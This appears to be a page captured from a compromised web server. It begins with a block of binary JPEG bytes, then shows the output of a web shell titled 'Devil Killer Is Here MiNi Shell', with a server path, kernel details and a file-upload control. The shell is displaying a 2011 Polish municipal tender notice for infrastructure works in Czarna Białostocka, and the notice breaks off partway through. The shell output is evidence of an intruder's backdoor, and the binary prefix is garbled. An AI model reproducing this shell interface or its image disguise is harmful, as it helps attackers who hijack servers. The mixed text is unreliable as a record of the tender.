JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/399898-N-2011.html

<p class="kh_header"><b>Czarna Białostocka: Budowa sieci wodociągowo-kanalizacyjnych i sieci teleinformatycznych, dróg i parkingów oraz monitoringu na terenie Podlaskiego Parku Przemysłowego w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 399898 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowo-kanalizacyjnych i sieci teleinformatycznych, dróg i parkingów oraz monitoringu na terenie Podlaskiego Parku Przemysłowego w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na:

1)	Budowa sieci kanalizacji sanitarnej i wodociągowej wraz z przyłączami na terenie PPP w Czarnej Białostockiej:
a)	wykonanie geodezyjnego tyczenia trasy sieci i przyłączy kanalizacyjnych i wodociągowych;
b)	wykopy pod sieć i przyłącza wodociągowe i kanalizacji sanitarnej;
c)	wykonanie sieci wodociągowej z wpięciem do węzła W64 (wykonany w roku 2010) wraz z przeciskami, przyłączami wodociągowymi, z niezbędnym osprzętem odcinającym oraz hydrantami, z rur PE PN10 SDR 17 lub równoważnych w zakresie średnic:
śr. 160 mm - ok. 643 mb,
śr. 110 mm - ok. 41 mb,	
śr. 90 mm - ok. 7 mb;
d)	wykonanie sieci kanalizacji sanitarnej, ciśnieniowej i grawitacyjnej wraz z przykanalikami z rur:
PE 110 x 6,6 lub równoważnych - ok. 540 mb (w tym do wydzielenia koszty budowy odcinka o długości ok.38,50 mb),
PCV, litych, klasy S lub równoważnych o średnicy:
DN 200 - ok. 534 mb (w tym do wydzielenia koszty budowy odcinka długości ok.38,50 mb),
DN 160 - ok. 31 mb;
e)	dostawa, montaż i uruchomienie przepompowni ścieków P5A typu PS - IC 2 BW.265G.475.80/80 ZP.Z.150 lub równoważnej z przyłączem energetycznym - zalicznikową linią kablową nn typu YKYżo5x10 mm2 lub równoważną długości ok. 215 mb (w tym do wydzielenia koszty budowy odcinka długości ok. 26 mb) wraz z wyposażeniem w pompy z wirnikiem otwartym Vortex lub równoważne, układy hydrauliczne, sterownicze, w obudowie  z polimerobetonu lub równoważnej o szacunkowej średnicy DN 1500 mm i szacunkowej wysokości całkowitej H=6520 mm wraz z ogrodzeniem z siatki stalowej, prętowej o oczkach 50x200 z drutu o 5 mm lub równoważnej , wysokości min. 1,50 m osadzonej na słupkach stalowych min. 60x40x2 mm lub równoważnych, z furtą wejściową o szerokości min 1,00 m osadzonej na słupku stalowym min. 60x60x2mm, z zamknięciem ryglowym furty pod kłódkę;
f)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
g)	uwaga: koszty związane z dostawą, montażem, uruchomieniem przepompowni P5A lub równoważnej wraz z ogrodzeniem oraz fragmentami przyłącza energetycznego (odcinek przewodu YKYżo5x10 mm2 lub równoważny - ok. 26 mb ), sieci kanalizacji grawitacyjnej (odcinek z rur PVC litych, klasy S lub równoważnych DN 200 - ok. 38,50 mb wraz ze studniami 1/1 oraz 2/1) i kanału ciśnieniowego (odcinek z rur PE 110 x 6,6 lub równoważnych - ok. 38,50 mb) znajdujące się poza granicą działki 1578/78 w kierunku ww. przepompowni należy przedstawić w formie odrębnej kalkulacji cenowej.

2)	Budowa ulic i parkingu na terenie PPP w Czarnej Białostockiej w zakresie robót sanitarnych - kanalizacja deszczowa polegających na:
a)	wykonanie geodezyjnego tyczenia trasy sieci i przykanalików kanalizacji deszczowej;
b)	wykopy pod sieć i przykanaliki kanalizacji deszczowej;
c)	wykonanie sieci i przykanalików kanalizacji deszczowej z rur plastikowych polipropylenowych lub równoważnych z piaskownikiem typu STEJAX OS-3 lub równoważnym o pojemności czynnej 3,00 m3, separatorem produktów ropopochodnych typu STEJAX O 10/100 lub równoważnym, odwodnieniem liniowym ACO DRAIN lub równoważnym układanych z korpusów korytkowych 25x30 z rusztem żeliwnym klasy D 400 na ławie z betonu B15;
d)	parkingu z systemem skrzynek rozsączających w technologii AZURA lub równoważnym wraz z niezbędnym uzbrojeniem w zakresie średnic:
rury:
o śr. 200 mm - ok. 93 mb (przykanaliki),
o śr. 300 mm - ok. 309 mb,	
o śr. 400 mm - ok. 200 mb;
studnie:
rewizyjne żelbetowe lub równoważne (połączeniowe i przelotowe) o śr. 1200 mm zaizolowane dwukrotnie na zewnątrz z kominami włazowymi, płytą nadstudzienną oraz pierścieniem odciążającym i włazem żeliwnym typu ciężkiego lub rozwiązania równowaznego- 12 szt.,
betonowe uliczne o śr. 500 mm z osadnikiem h=0,5m lub równoważne , zaizolowane dwukrotnie na zewnątrz, z żeliwnym wpustem ulicznym klasy D400 lub równoważnym oraz pierścieniem odciążającym lub równoważnym - 21 szt.;
e)	wykonanie geodezyjnej inwentaryzacji powykonawczej;

3)	Budowa ulic i parkingu na terenie PPP w Czarnej Białostockiej w zakresie robót drogowych (w całości zadanie III w dokumentacji projektowej) polegających na:
a)	wykonanie geodezyjnego tyczenia trasy dróg w terenie wraz z odtworzeniem trasy i punktów wysokościowych,
b)	mechaniczne ścinanie drzew i krzewów wraz z karczowaniem i wywiezieniem dłużyc, karpi i gałęzi oraz oczyszczeniem terenu;
c)	usuniecie warstwy ziemi urodzajnej - ok. 5.842,00 m2 i transport humusu na odległość ok. 10 km (miejsce wskazane przez Zamawiającego) - ok. 875,00 m3,
d)	rozbiórka nawierzchni z płyt prefabrykowanych pełnych - ok. 224,00 m2;
e)	rozbiórka nawierzchni z płyt drogowych, betonowych gr. 15 cm (trylinka) - ok. 3.173,00 m2,
f)	transport materiałów sypkich - ok. 889 ton,
g)	transport materiałów sztukowych - ok. 83,00 ton,
h)	przekruszenie materiałów  betonowych z rozbiórki - ok. 889,00 ton,
i)	ręczna rozbiórka torów kolejki wąskotorowej - ok. 30 mb,
j)	wykopy, przekopy z transportem urobku samochodami samowyładowczymi - ok. 724,00 m3,
k)	wykonanie nasypów - z formowaniem i zagęszczaniem - ok. 1.024,00 m3,
l)	wykonanie kanalizacji teletechnicznej pierwotnej z rur PCV 110x3,2 lub równoważnych - ok. 166 m,
m)	wykonanie studni kablowych prefabrykowanych z pokrywami - 5 szt.,
n)	wykonanie linii oświetlenia ulicznego 4x35 mm2 - ok.526,00 m w wykopach z taśmą ostrzegawczą, ok. 255,00 m w rurach osłonowych (DVK 75 mm lub równoważnych - ok. 62,00 m, SRS110 mm lub równoważnych - ok.193,00 m), AROT 160 PS lub równoważnych- ok. 26 m  oraz linii nn 4 x 120 mm2 - ok. 380,00 m z czego 93,00 m w rurze osłonowej SRS110 wraz z uziomem lub równoważnej i 4x70 mm2 - ok. 15,00 m,
o)	mechaniczne ustawianie słupów oświetleniowych typu Sextent P-8 lub równoważnych - 30 szt.,
p)	montaż wysięgników typu Orion OC-S (pojedyncze - 22 szt.) lub równoważnych i OC-D (podwójne - 8 szt.)  lub równoważnych na słupach - łącznie 30 szt.,
q)	montaż opraw oświetlenia zewnętrznego na wysięgnikach - 38 szt.,
r)	wykonanie badań i pomiarów obwodów elektrycznych - 7 pomiarów, rezystancji izolacji instalacji elektrycznej - 7 pomiarów, badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania - 39 szt.,
s)	wykonanie podbudowy drogi i parkingu - korytowanie wraz z profilowaniem i zagęszczeniem podłoża - ok. 8.940,00 m2,
t)	oczyszczenie i skrapianie asfaltem warstw konstrukcyjnych  - ok. 14.565,00 m2,
u)	podbudowy z kruszyw naturalnych i stabilizowanych mechanicznie:
pospółka gr. 10 cm po zagęszczeniu (chodnik) - ok. 1.849 m2,
tłuczeń gr. 25 cm po zagęszczeniu (parking) - ok. 1.756,00 m2,
tłuczeń gr. 20 cm po zagęszczeniu, doziarniona w 50% kruszywem łamanym uzyskanym z przekruszenia elementów betonowych, dostarczonym z zewnątrz lub w całości z tłucznia - ok.5.331,00 m2;
v)	transport wewnętrzny kruszywa - ok. 3.451,00 ton,
w)	podbudowa z mieszanek mineralno-bitumicznych gr. 7 cm - ok. 3.939,00 m2,
x)	nawierzchnie żwirowe poboczy gr. 16 cm po zagęszczeniu - ok. 169,00 m2,
y)	nawierzchnie z betonu asfaltowego:
wiążąca gr. 6 cm - ok. 3,923,00 m2,
ścieralna gr. 5 cm - ok. 3.908,00 m2,
wiążąca gr. 7 cm - ok. 1.372,00 m2,
ścieralna gr. 5 cm - ok. 1.372,00 m2,
z)	transport mieszanki bitumicznej do miejsca wbudowania - ok. 1.467,00 ton,
aa)	mechaniczne frezowanie nawierzchni asfaltowej na głębokość 8 cm z wywiezieniem na odległość do 10 km - ok. 3.043,00 m2,
bb)	wykonanie wjazdu i parkingu z kostki brukowej betonowej gr. 8 cm na podsypce cementowo-piaskowej gr. 5 cm - ok. 1.756,00 m2,
cc)	osadzenie krawężników betonowych (wystających 20x30 cm i wtopionych 20x22 cm) w wykonanych rowkach na ławach krawężnikowych 35x45 cm - ok. 1.349,00 m,
dd)	ławy betonowe pod krawężniki - ok. 212,00 m3,
ee)	nawierzchnie z kostki brukowej, betonowej gr. 6 cm  na podsypce piaskowej (chodniki) - ok. 1.849,00 m2,
ff)	obsadzenie obrzeży  chodnikowych 20x6 cm na podsypce piaskowej - ok. 847,00 m,
gg)	wykonanie ścieków betonowych gr. 15 cm, na podsypce cementowo-piaskowej - ok. 52,00 m,
hh)	wykonanie ścieków pochodnikowych gr. 15 cm, na podsypce cementowo-piaskowej - ok.4,00 m,
ii)	wykonanie odwodnienia liniowego z korytek ściekowych typu ciężkiego - ok. 80 m,
jj)	wykonanie ław betonowych z oporem pod ww. ścieki i odwodnienia - ok. 18,00 m3,
kk)	wykonanie znakowania pionowego na rurach dn 60 mm - 3 szt.,
ll)	wykonanie znakowania poziomego, grubowarstwowego, mechanicznego - linie ciągłe - ok. 114,00 m2,
mm)	wykonanie znakowania poziomego, grubowarstwowego, mechanicznego - linie przerywane - ok. 31,00 m2,
nn)	humusowanie warstwą 5 cm i obsianie skarp trawą - ok. 1.054,00 m2,
oo)	wykonanie geodezyjnej inwentaryzacji powykonawczej;

4)	Budowa ulic i parkingu na terenie PPP w Czarnej Białostockiej w zakresie robót drogowych (wyodrębniona część zadania II na styku z zadaniem III w dokumentacji projektowej) polegających na:
a)	wykonanie geodezyjnego tyczenia trasy dróg w terenie wraz z odtworzeniem trasy i punktów wysokościowych,
b)	usuniecie warstwy ziemi urodzajnej - ok. 162,00 m2 i transport humusu na odległość ok. 20 km (miejsce wskazane przez Zamawiającego)- ok. 24,00 m3, 
c)	rozbiórka nawierzchni z płyt drogowych, betonowych gr. 15 cm (trylinka) - ok. 280,00 m2,
d)	transport materiałów sypkich - ok. 78 ton,
e)	przekruszenie materiałów  betonowych z rozbiórki - ok. 78,00 ton,
f)	wykopy, przekopy z transportem urobku samochodami samowyładowczymi - ok. 117,00 m3,
g)	wykonanie nasypów - z formowaniem i zagęszczaniem - ok. 117,00 m3,
h)	wykonanie podbudowy drogi - korytowanie wraz z profilowaniem i zagęszczeniem podłoża - ok. 391,00 m2,
i)	oczyszczenie i skrapianie asfaltem warstw konstrukcyjnych  - ok. 971,00 m2,
j)	podbudowy z kruszyw naturalnych i stabilizowanych mechanicznie:
pospółka gr. 10 cm po zagęszczeniu (chodnik) - ok. 36,50 m2,
tłuczeń gr. 20 cm po zagęszczeniu, doziarniona w 50% kruszywem łamanym uzyskanym z przekruszenia elementów betonowych, dostarczonym z zewnątrz lub w całości z tłucznia - ok.331,00 m2;
k)	transport wewnętrzny kruszywa - ok. 28,00 ton,
l)	podbudowa z mieszanek mineralno-bitumicznych  gr. 7 cm - ok. 323,50 m2,
m)	nawierzchnie żwirowe poboczy gr. 16 cm po zagęszczeniu - ok. 45,00 m2,
n)	nawierzchnie z betonu asfaltowego:
wiążąca gr. 6 cm - ok. 317,00 m2,
ścieralna gr. 5 cm - ok. 312,00 m2;
o)	transport mieszanki bitumicznej do miejsca wbudowania - ok. 85,00 ton,
p)	mechaniczne frezowanie nawierzchni asfaltowej na głębokość 8 cm z wywiezieniem na odległość do 20 km - ok. 280,00 m2,
q)	osadzenie krawężników betonowych (wystających 20x30 cm i wtopionych 20x22 cm) w wykonanych rowkach na ławach krawężnikowych z oporem 35x45 cm - ok. 20,00 m,
r)	ławy betonowe pod krawężniki - ok. 2,40 m3,
s)	nawierzchnie z kostki brukowej, betonowej, szarej gr. 6 cm  na podsypce piaskowej (chodniki) - ok. 36,50 m2,
t)	obsadzenie obrzeży  chodnikowych 20x6 cm na podsypce piaskowej - ok. 20,50 m,
u)	wykonanie znakowania pionowego na rurach dn 60 mm - 3 szt. rur/4 szt. znaki,
v)	wykonanie znakowania poziomego, grubowarstwowego, mechanicznego - linie ciągłe - ok. 5,00 m2,
w)	wykonanie znakowania poziomego, grubowarstwowego, mechanicznego - linie przerywane - ok. 2,00 m2,
x)	humusowanie warstwą 10 cm i obsianie skarp trawą - ok. 70,00 m2,
y)	wykonanie kanalizacji teletechnicznej pierwotnej z rur PCV 110x3,2 lub równoważnych - ok. 15,40 m,
z)	wykonanie studni kablowych prefabrykowanych z pokrywami z montażem elementów mechanicznej ochrony przed ingerencją osób nieuprawnionych - 1 szt.,
aa)	wykonanie linii oświetlenia ulicznego 4x35 mm2 - ok.526,00 m w wykopach z taśmą ostrzegawczą, ok. 255,00 m w rurach osłonowych (DVK 75 mm lub równoważnych - ok. 62,00 m, SRS110 mm lub równoważnych - ok.193,00 m), AROT 160 PS lub równoważnych- ok. 26 m  oraz linii nn 4 x 120 mm2 - ok. 380,00 m z czego 93,00 m w rurze osłonowej SRS110 wraz z uziomem lub równoważnej i 4x70 mm2 - ok. 15,00 m,
bb)	mechaniczne ustawianie słupów oświetleniowych typu Sextent P-8 lub równoważnych - 3 szt.,
cc)	montaż wysięgników typu Orion OC-S lub równoważnych na słupach - 3 szt.,
dd)	montaż opraw oświetlenia zewnętrznego na wysięgnikach - 3 szt.,
ee)	wykonanie badań i pomiarów obwodów elektrycznych - 1 pomiar, rezystancji izolacji instalacji elektrycznej - 1 pomiar, badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania - 3 szt.,
ff)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
gg)	uwaga: na zakres określony w § 3 ust. 1 pkt. 4 niniejszej specyfikacji należy przedstawić odrębną kalkulację cenową;

5)	Budowa ulic i parkingu na terenie PPP w Czarnej Białostockiej w zakresie robót drogowych - monitoring wizyjny polegający na:
a)	wykonanie geodezyjnego tyczenia trasy dróg w terenie wraz z odtworzeniem trasy i punktów wysokościowych,
b)	budowa kanalizacji kablowej pierwotnej z rur PCW 110/3 lub równoważnych - ok. 214,00 mb,
c)	budowa kanalizacji kablowej pierwotnej z rur HDPE 110/6,3 lub równoważnych - ok. 245,00 mb,
d)	dostawa i montaż masztów z fundamentem typu Sextent P-6 lub równoważnych - 3 szt. z uziomami ze stali profilowanej miedziowanej lub równoważnymi - 3 szt.,
e)	budowa studni kablowych prefabrykowanych rozdzielczych SKR lub równoważnych wraz z elementami mechanicznej ochrony przed ingerencją osób nieuprawnionych typu SKR-2/1 lub równoważnych - 8 szt. oraz typu SKR-1 lub równoważnych - 8 szt. (w tym do wydzielenia koszt budowy jednej studni SKR-1),
f)	budowa kanalizacji wtórnej z rur HDPE w zwojach 1xo32/2,9 lub równoważnych - ok. 484 mb,
g)	dostawa i montaż  kabli światłowodowych w kanalizacji wtórnej bądź szybach lub kanałach budynków XOTKtsd 24J - ok. 491,00 mb, XOTKtsD 4J - ok. 114,00 mb, XOTKtsD 4G - ok. 12,00 mb lub równoważnych wraz z wykonaniem optotelekomunikacyjnych złącz odgałęźnych i złącz końcowych - ok. 155 złącz ww. kabli bądź równoważnych,
h)	wykonanie zasilania kamer i konwerterów kablem YKY3x2,5 mm2 oraz YKY3x1,5 mm2 wypełnionym w powłoce termoplastycznej lub równoważnym - o łącznej długości trasowej ok. 787,00 mb w kanalizacji kablowej, słupach oraz gruncie wraz z montażem bez śrubowym puszek o wymiarach 75x75 mm lub równoważnych z wymiennymi wylotami - 11 szt., 
i)	wykonanie zasilania serwerowni kablami YKY5x16 mm2 o długości montażowej ok. 32 mb oraz YKY5x10 mm2 o długości montażowej ok. 60 mb (w tym do wydzielenia koszt budowy zasilania długości montażowej ok. 40 mb),
j)	dostawa, montaż i uruchomienie konwerterów wraz z obudowami - 10 szt.,
k)	- dostawa, montaż i uruchomienie stacji bazowej - serwer - 1 szt., o pojemności 10 TB (składający się z dwóch serwerów 5TB lub równoważnych) lub równoważny wraz z montażem przełącznic światłowodowych panelowych, skrzynkowych lub równoważnych - 47 szt., 
l)	wykonanie pomiarów reflektometrycznych linii światłowodowych - 36 odcinków,
m)	wykonanie pomiarów tłumienności optycznej - 36 odcinków,
n)	wykonanie pomiarów elektrycznych - 2 odcinki,
o)	wykonanie badań i pomiarów instalacji uziemiającej, piorunochronnej i skuteczności zerowania - 3 szt.,
p)	wykonanie sprawdzenia działania wyłącznika zasilania oraz wyłącznika różnicowoprądowego - 1 próba,
q)	wykonanie geodezyjnej inwentaryzacji powykonawczej,
r)	uwaga: na zakres określony w § 3 ust. 1 pkt. 5 lit. e, i, l, k niniejszej specyfikacji należy przedstawić odrębną kalkulację cenową w zakresie określonym w danym punkcie.

6)	Wyodrębnione ceny realizacji części zamówienia wskazane przez Zamawiającego (odrębne kalkulacje cenowe) zawierają się w cenie ofertowej i są elementem  składowym całkowitej ceny ryczałtowej przedstawionej przez Wykonawcę w ofercie.

7)	Wyłoniony Wykonawca w trakcie prowadzonych robót wielobranżowych zabezpieczy ciągłość dojazdu pojazdom ciężarowym do wrót zlokalizowanych w szczytach  dwóch hal (w których prowadzona jest produkcja) znajdujących się na terenie przyszłego Podlaskiego Parku Przemysłowego oznaczonych na załączniku inwentaryzacja geodezyjna - II etap literami A-B oraz C-D.
8)	W sierpniu 2011 r. zakończono II etap projektu budowy i uruchomienia Podlaskiego Parku Przemysłowego polegający na wyrębie, karczowaniu, rozbiórce dziewięciu budynków oraz budowli (rampy kolejowe, słupy oświetleniowe, basen ppoż, żelbetowe konstrukcje podtrzymujące sieci ciepłowniczych, zbędne sieci energetyczne, wodociągowe i kanalizacyjne), niwelacja terenu.
9)	W 2011 roku do granicy PPP doprowadzono sieć kanalizacji tłocznej wykonanej przeciskiem sterowanym z rur PE RC 110 x 6,6 wraz z przeciskiem w rurze osłonowej RS 160 długości l=9 m.
10)	W 2010 roku wykonano sieć wodociągową z rur PE o 160 SDR 17 do węzła W64 od którego należy wykonać przecisk w rurze osłonowej RS 219 długości l=14 m i pozostałą sieć z przyłączami na terenie PPP.
11)	W trakcie ewaluacji projektu zrezygnowano z realizacji następujących odcinków kanalizacji sanitarnej: od studni zbiorczej 10/1 do przyłączeniowej projektowanej do wykonania w odległości l=6 m (wykonać) pozostałe tj. 11/1 do 16/1 - nie brać pod uwagę, od studni 1/1 poprzez 19/1 do 21/1 - nie brać pod uwagę.
12)	W trakcie ewaluacji projektu zrezygnowano z realizacji następujących odcinków sieci wodociągowej:   - nie brać pod uwagę odcinka od węzła W 69/1/1 poprzez W69/2 do W69/8 i W69/9 wraz z hydrantami H 18 do H20, - nie brać pod uwagę odcinka od W77 do W80 wraz z hydrantami H16 i H17. W miejscu węzła W77 - korek, zasuwa lub rozwiązanie równoważne - zabezpieczenie rozbudowy.

13)	Szczegółowy zakres prac objętych zamówieniem zawierają stanowiące załączniki do niniejszej specyfikacji:
a)	dokumentacje projektowe,
b)	specyfikacje techniczne wykonania i odbioru robót, 
c)	przedmiary robót (które należy traktować jako materiał pomocniczy),
użyte w opisie przedmiotu zamówienia oraz powyższych dokumentach znaki towarowe, patenty, nazwy własne itp. Zamawiający rozszerza o zapis: lub równoważne;
14)	projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego;
15)	użyte do budowy materiały powinny posiadać odpowiednie dopuszczenia do stosowania                             w budownictwie oraz odpowiadać wymaganiom określonym w projektach budowlanych.

2.	Wymagania organizacyjne:
1)	Wykonawca przedstawi Zamawiającemu harmonogram rzeczowo-finansowy robót, który stanowić będzie integralną część umowy:
a)	harmonogram powinien zawierać opis robót z podziałem na 3 etapy (kwartały):
I etap - kwartał - nie więcej niż 20 % oferowanych kosztów realizacji inwestycji,
II etap - kwartał - nie więcej niż 40% oferowanych kosztów realizacji inwestycji,
III etap - kwartał - nie mniej niż 40% oferowanych kosztów realizacji inwestycji;
b)	Zamawiający może wyrazić zgodę na zmianę harmonogramu w trakcie prowadzenia prac budowlanych; 
c)	zmiana harmonogramu rzeczowo-finansowego każdorazowo wymaga zgody Zamawiającego wyrażonej w formie pisemnej pod rygorem nieważności;
d)	w żadnych okolicznościach Zamawiający nie będzie miał obowiązku wyrażenia zgody na zmianę harmonogramu rzeczowo-finansowego;
e)	zmiana harmonogramu rzeczowo - finansowego, która nie będzie powodować zmian terminu wykonania zamówienia nie stanowi istotnej zmiany umowy w  rozumieniu art. 144 ust. 1 ustawy Prawo zamówień publicznych
f)	w przypadkach, kiedy:
zaistnieje opóźnienie w stosunku do harmonogramu rzeczowo - finansowego,
zaistnieje uzasadnione przypuszczenie, że takie opóźnienie może wystąpić,
Wykonawca sam lub na polecenie Zamawiającego/inspektora nadzoru, w terminie 3 dni jest zobowiązany przedstawić raport zawierający wyliczenie opóźnienia (lub przewidywanego opóźnienia) oraz szczegółowy program naprawczy wskazujący na sposoby i metody usunięcia opóźnienia; po uzyskaniu akceptacji Zamawiającego, Wykonawca powinien niezwłocznie wdrożyć taki program naprawczy;
g)	w przypadku zaistnienia opóźnienia wynoszącego, co najmniej 14 dni w realizacji prac, robót budowlanych i elementów w stosunku do terminów określonych w harmonogramie rzeczowo-finansowym Zamawiający jest uprawniony do zażądania od Wykonawcy realizacji prac i robót budowlanych przy użyciu określonej przez Zamawiającego liczby pracowników lub prowadzenia prac i robót budowlanych w systemie dwu lub trzyzmianowym. Wykonawca będzie miał 7 dni na zastosowanie się do tego polecenia. Niezależnie od tego Wykonawca będzie zobowiązany do zapłaty na rzecz Zamawiającego kary umownej określonej w § 7 ust. 1 pkt 3  umowy. Zamawiający na wniosek Wykonawcy cofnie polecenie, gdy opóźnienie zostanie nadrobione i prace będą prowadzone zgodnie z harmonogramem rzeczowo - finansowym. Zamawiający może w każdej chwili cofnąć polecenie, o którym mowa powyżej w przypadku, gdy Wykonawca przedstawi mu inny racjonalny plan nadrobienia opóźnienia, który Zamawiający zaakceptuje w formie pisemnej;
2)	Wykonawca będzie składał Zamawiającemu, w terminie do 7-ego dnia każdego miesiąca kalendarzowego, miesięczne raporty z postępu robót w formie pisemnej, określające  zgodność postępu robót z zakresem i terminami ustalonymi w harmonogramie rzeczowo-finansowym robót. Raport będzie zawierał co najmniej:
a)	aktualny harmonogram rzeczowo-finansowy, przy czym zmiana harmonogramu jest możliwa jedynie za zgodą Zamawiającego,
